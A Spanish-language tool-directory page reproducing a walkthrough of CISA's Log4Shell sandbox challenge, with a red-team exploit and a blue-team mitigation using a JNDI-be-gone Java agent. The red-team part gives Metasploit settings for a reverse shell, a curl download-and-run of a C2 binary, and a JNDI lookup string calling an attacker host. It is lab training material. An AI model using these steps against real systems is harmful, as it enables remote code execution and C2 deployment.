Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/felisha-elmer/sandbox-challenge-log4shell-cve-2021-44228-
Herramientas DefensivasAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed TeamingRespuesta a IncidentesLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
felisha-elmer/sandbox-challenge-log4shell-cve-2021-44228-

Sandbox-Challenge-Log4Shell-CVE-2021-44228-

Guía paso a paso del desafío del sandbox de Log4Shell de CISA, que cubre explotación ofensiva mediante Metasploit y mitigación defensiva usando un agente Java JNDI-be-gone.

Ver Repositorio
6hace 3 mesesAún no revisado
Compartir

Desafío Sandbox: Log4Shell (CVE-2021-44228)

Resumen

Este recorrido documenta los pasos realizados para completar el Desafío Sandbox de Amenazas de CISA para CVE-2021-44228, comúnmente conocido como Log4Shell. El desafío implicó completar dos objetivos — uno de equipo rojo (ofensivo) y uno de equipo azul (defensivo) — contra un proveedor ficticio de servicios gestionados de TI (MSP) llamado DasMSP dentro de un entorno sandbox aislado.

Nota: Los comandos y rutas de archivos en este recorrido reflejan los pasos específicos realizados en este entorno. Su entorno puede diferir, incluyendo direcciones IP, ubicaciones de archivos y disponibilidad de herramientas. Adapte los comandos según sea necesario para su configuración.


Antecedentes

CVE-2021-44228 es una vulnerabilidad crítica de ejecución remota de código (RCE) con una puntuación CVSS de 10.0 que afecta versiones específicas del framework de registro Java Apache Log4j. La vulnerabilidad surge de la función de búsqueda JNDI de Log4j, que puede activarse inyectando una cadena especialmente diseñada como ${jndi:ldap://attacker.com/exploit} en cualquier dato que Log4j registre. Si un atacante logra que una aplicación vulnerable registre una cadena maliciosa — comúnmente a través de cabeceras HTTP — Log4j se comunicará con el servidor controlado por el atacante y ejecutará código arbitrario.

Log4Shell fue agregado al Catálogo de Vulnerabilidades Explotadas Conocidas (KEV) de CISA el 10 de diciembre de 2021, y apareció en los avisos conjuntos de Vulnerabilidades Explotadas de Forma Rutinaria tanto para 2021 como para 2022.


Entorno

MáquinaIP
Security-Desk<Security-Desk-IP>
Red Target<Red-Target-IP>
Blue Target<Blue-Target-IP>

Ambos sistemas objetivo son Linux y ejecutan una aplicación web Java vulnerable (dasmsp.jar) que utiliza una versión afectada de Log4j.


Herramientas Utilizadas

  • Metasploit Framework (exploit/multi/http/log4shell_header_injection)
  • curl
  • Python3 HTTP Server
  • SSH
  • SCP
  • systemctl
  • nano

Objetivo del Equipo Rojo: Desplegar un Listener C2 en Red Target

Paso 1 — Iniciar Metasploit

Abrió una terminal en Security-Desk e inició Metasploit:

root@kitploit:~
msfconsole

Paso 2 — Buscar el Módulo de Log4Shell

La ruta del módulo proporcionada en la sesión informativa no coincidía con la versión instalada. Se buscó el módulo correcto:

root@kitploit:~
search log4shell

Paso 3 — Configurar el Exploit

root@kitploit:~
use exploit/multi/http/log4shell_header_injection
set RHOSTS <Red-Target-IP>
set RPORT 80
set SRVHOST <Security-Desk-IP>
set PAYLOAD java/shell_reverse_tcp
set LHOST <Security-Desk-IP>

Paso 4 — Ejecutar el Exploit

root@kitploit:~
run

Metasploit probó automáticamente múltiples cabeceras HTTP para la vulnerabilidad Log4Shell. Se confirmó que el Red Target era vulnerable a través de múltiples cabeceras (Authorization, Cache-Control, User-Agent, X-Forwarded-For, y otras). Se abrió una sesión de shell de comandos en el Red Target.

Paso 5 — Verificar Acceso a la Shell

Se confirmó acceso a nivel root en el Red Target:

root@kitploit:~
id

Output: uid=0(root) gid=0(root) groups=0(root)

Paso 6 — Transferir y Ejecutar deploy_c2

El binario deploy_c2 se encontraba en Security-Desk, no en el Red Target. No había wget ni una referencia de ruta directa disponible en el objetivo. Se abrió una segunda terminal en Security-Desk y se sirvió el archivo a través de Python:

root@kitploit:~
cd ~/Desktop/Resources
python3 -m http.server 8080

De vuelta en la sesión de shell de Metasploit en el Red Target, se descargó y ejecutó el binario:

root@kitploit:~
curl http://<Security-Desk-IP>:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2

Output: Done!

✅ Listener C2 Desplegado en Red Target comprobación confirmada.


Objetivo del Equipo Azul: Mitigar CVE-2021-44228 en Blue Target

El método de mitigación utilizado es el agente Java log4j-jndi-be-gone-standalone.jar desarrollado por NCC Group, que parchea el comportamiento de búsqueda JNDI en tiempo de ejecución sin requerir un parche en la aplicación subyacente. Los detalles sobre este agente se pueden encontrar en el blog de investigación de NCC Group.

Paso 1 — Transferir el Agente Java al Blue Target

Desde la terminal de Security-Desk, se usó SCP para transferir el archivo JAR del agente Java:

root@kitploit:~
scp ~/Desktop/Resources/log4j-jndi-be-gone-standalone.jar playerone@<Blue-Target-IP>:/tmp/

Paso 2 — Conectarse por SSH al Blue Target

root@kitploit:~
ssh playerone@<Blue-Target-IP>

Paso 3 — Editar el Archivo de Unidad de Servicio

root@kitploit:~
sudo nano /etc/systemd/system/dasmsp.service

Se localizó la línea ExecStart y se añadió el flag -javaagent:

Antes:

root@kitploit:~
ExecStart=/usr/lib/jvm/nvidia-java-8-openjdk-amd64/bin/java -jar /opt/dasmsp.jar

Después:

root@kitploit:~
ExecStart=/usr/lib/jvm/nvidia-java-8-openjdk-amd64/bin/java -javaagent:/tmp/log4j-jndi-be-gone-standalone.jar -jar /opt/dasmsp.jar

Guardado con Ctrl+O → Enter → Ctrl+X.

Paso 4 — Recargar y Reiniciar el Servicio

root@kitploit:~
sudo systemctl daemon-reload
sudo systemctl restart dasmsp

✅ CVE-2021-44228 Mitigado en Blue Target comprobación confirmada.

Descargar herramienta